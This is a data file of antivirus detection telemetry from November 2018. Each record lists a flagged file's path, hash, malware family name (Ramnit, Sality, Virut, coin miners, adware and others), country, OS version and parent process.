  Row(detection=Row(filename='avscan-20181102-002307-3c8f7ac6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002307-3C8F7AC6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003043-494092a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6e0c13b9\\AVSCAN-20181102-002939-3FC510D6\\AVSCAN-20181102-003043-494092A6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='LB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:30:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2258.exe', filepath='I:\\.Trashes\\2258.exe', filesize=512000, name='TR/Dropper.Gen.#M300.#R241'), hash='83ef079fb538f232884ca1f3c64ad14e939d3ddcf013d1089320abc77477beab', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:21:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000424d', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp0000424d', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T15:38:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='exchcsp.dll', filepath='E:\\soft\\Office\\office2003\\FILES\\PFILES\\MSOFFICE\\OFFICE11\\EXCHCSP.DLL', filesize=476000, name='W32/Ramnit.C.#M0.#R0'), hash='6771350e66fb071ef1b6760052e6556e54d349b213ff2c6210c00a16d9332f8b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T04:48:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:57:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-135436-9abd9b76', filepath='C:\\Documents and Settings\\X\\Datos de programa\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-135216-55038D67\\AVSCAN-20181101-135436-9ABD9B76', filesize=192000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='344ba62ba269338d2e1f67d88121e7a53a5bb4d6d06958190c128faf044af500', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:53:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-203959-b3bf4408', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_46807aa2\\AVSCAN-20181101-203301-8323FC51\\AVSCAN-20181101-203959-B3BF4408', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:39:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095701-8f2b7e87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095701-8F2B7E87', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ymm_prec.dll', filepath='C:\\CYPE Ingenieros\\Versión 2012\\programas\\ymm_prec.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='f2eae9276ff97445e62b76e75a6f91db7c3b8797e9bd673b03c661d0f16cb6ea', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T12:42:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='informatica programmi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\SORZI PROGRAMMI\\informatica programmi.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:30:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='schede presentazione corsi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI NUOVI DEFINIITIVI\\schede presentazione corsi.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8a09a30645885737b1b40007c9da1460bfcebb22fa369cf17f9de8f8efe37345', metadata=Row(cmdline=None, country='AM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T16:20:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\000 Kayu Lapis Indonesia\\Software\\instaler\\(D) CD v3_1VI\\Lan\\RealTek\\Setup.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='c53def0da5663ee6911a7a6c16bee144e5691a383f497076593b43727a778697', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:49:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\yblzibmkdbd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/monitor', country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18334528, timestamp='2018-11-01T05:46:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140_30ab8c89.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140_30ab8c89.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iim marmagya.exe', filepath='G:\\IIM Marmagya\\IIM Marmagya.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:55:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgECD7C.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\yw15pqe22be\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540457318.5bd1836688dae', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Capture\\169492924.exe', parentsize=670720, timestamp='2018-11-01T02:22:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152930-dfb12d8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152930-DFB12D8C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:29:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allegati pag. 272 a pag. 324.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\SICUREZZA NEI LUOGHI DI LAVORO\\L.812008\\Allegati pag. 272 a pag. 324.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093722-ad2394ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093722-AD2394CE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:37:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xmrig.exe', filepath='C:\\Users\\X\\Downloads\\xmrig-2.4.4-gcc-win64\\xmrig-2.3.1-msvc-win64 - Kopie\\xmrig.exe', filesize=448000, name='HEUR/AGEN.1004159.#M1.#R1'), hash='e27e5ced296898518d1afea14f01e1c470cd013dd13534f48e1c1e5b0fdd7ef0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:eUcVYytiikGhrVDl.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:36:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='efccc4625ac15467fb5d01f886edd7a5d169411d677e93ee6e53b2e0c35286cd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\EFCCC4625AC15467FB5D01F886EDD7A5D169411D677E93EE6E53B2E0C35286CD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='efccc4625ac15467fb5d01f886edd7a5d169411d677e93ee6e53b2e0c35286cd', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:48:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-035241-e83c07be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_148ec154\\AVSCAN-20181101-035048-DA7D9C50\\AVSCAN-20181101-035241-E83C07BE', filesize=192000, name='ADWARE/EoRezo.Gen7.#M1.#R1'), hash='bbd9eb1b66ebcda11999124ea6c2cd258ca5f02ede53eaf819963d9da6d398f9', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152405-4d9fc0b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152405-4D9FC0B9', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:24:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235708-02408994', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235708-02408994', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:54:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165348-128afe24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163706-4CB2CFCA\\AVSCAN-20181101-165348-128AFE24', filesize=192000, name='Adware/Elex.umebz.#M1.#R1'), hash='bf33a2fa1417e9e761302b0d0f29c355a3841a18117dadb6085389763bbf5f4d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:53:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c46c4f55575370e282438751bf32315cbc586bb28a4fe859a71414f44dd4ca0f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C46C4F55575370E282438751BF32315CBC586BB28A4FE859A71414F44DD4CA0F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c46c4f55575370e282438751bf32315cbc586bb28a4fe859a71414f44dd4ca0f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:08:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yvnajkwr.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\yvnAJKwr.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0348217.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0348217.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:27:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150840-53d42d1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-150725-4B91DC60\\AVSCAN-20181104-150840-53D42D1F', filesize=512000, name='Adware/SpeedBit.ngud.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023d65', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023d65', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:41:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131113-171b983f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131113-171B983F', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140237-f044610f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140237-F044610F', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='awsscl.dll', filepath='D:\\Program Files\\Adobe\\Acrobat 7.0\\Acrobat\\AWSSCL.dll', filesize=1408000, name='W32/Ramnit.CD.#M1.#R1'), hash='7463681b6d424c135e5d06e59a7dabcb9f622e0ed4844ba5c4e0dcd6326cf1ed', metadata=Row(cmdline='\\\\\\/I {AC76BA86-2052-0000-7760-100000000002}', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=73216, timestamp='2018-11-04T12:37:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tobii_firmware_upgrade.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Tobii\\Service\\tobii_firmware_upgrade.dll', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='a1d6b8cd7cb92d828f99be298044c4d07386481636387045607f4c73a15ab4b8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:37:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145641-287d9c8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3d880bdd\\AVSCAN-20181104-145557-2193601E\\AVSCAN-20181104-145641-287D9C8C', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:56:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131636-2f86451b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131636-2F86451B', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:16:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132253-cb5e85bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8642045b\\AVSCAN-20181104-132105-BC2EDB48\\AVSCAN-20181104-132253-CB5E85BC', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:22:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:31:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-220246-e0f55ce7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8a27c881\\AVSCAN-20181103-220115-D65BC28E\\AVSCAN-20181103-220246-E0F55CE7', filesize=1844000, name='PUA/InstallCore.#M1.#R1'), hash='1b28257a33c6c912fd9a242149f00bb28bc7ce217a59be971850bc761f712eea', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:02:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172155-be800b56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172155-BE800B56', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:21:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151959-9ec680c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-151915-99EE9C1C\\AVSCAN-20181104-151959-9EC680C5', filesize=512000, name='Adware/SpeedBit.ngud.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:19:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='F:\\研究生简历\\商家爱玩\\新建文件夹\\尚素英\\新建文件夹\\软件\\2007CAD安装盘\\acadFeui\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a381dfef5929cbc85b788eab3459e90275f329339c74cfdf90bb3ba98832faa', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T15:32:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='7b10276e5701c1a391e40686cbe8e2dd94256bd6d9bb74387d81e86c825eb970', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:20:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000aab44', filepath='C:\\Windows\\Temp\\342e7ceb-d93d-4c8c-a51a-9c27e99af2f0\\tmp0000015c\\tmp000aab44', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T13:37:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0344861.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP437\\A0344861.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:05:29Z'), dt=datetime.date(2018, 11, 4)),
